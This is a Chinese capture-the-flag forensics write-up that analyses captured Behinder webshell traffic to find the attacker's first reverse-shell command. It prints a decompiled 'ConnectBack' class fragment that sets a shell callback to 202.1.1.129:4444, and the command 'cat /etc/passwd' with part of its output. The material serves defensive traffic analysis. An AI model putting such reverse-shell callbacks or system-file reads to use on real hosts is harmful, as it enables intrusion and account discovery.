关卡11

题目描述 #

关卡描述:黑客通过反连执行的第一条命令是什么?

Flag #

ip.addr == 202.1.1.66 && http.request.method == "POST" && http.request.uri contains "s74e7vwmzs21d5x6"

刚才已经通过第一条数据流获得密码、密钥。 使用[蓝队分析工具箱v1.08](https://github.com/abc123info/BlueTeamTools/releases/tag/v1.08)得到BehinderDecode.class

tcp.stream eq 283

eBJS9iX1FmWXGh6C1a392iVa7RtT2YdDZ0Ljvu3JpUeSaNPquz+aDEJrwQJKNe …… e4bAOoeaJFutTh/Z/ri4tVAGLZpwNjbQqA=

使用 jadx-gui打开BehinderDecode.class

/* loaded from: BehinderDecode.class */
public class ConnectBack extends ClassLoader implements Runnable {
    public static String type = "shell";
    public static String ip = "202.1.1.129";
    public static String port = "4444";
    private ServletRequest Request;
    private ServletResponse Response;
    private HttpSession Session;

继续

tcp.stream eq 284

cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin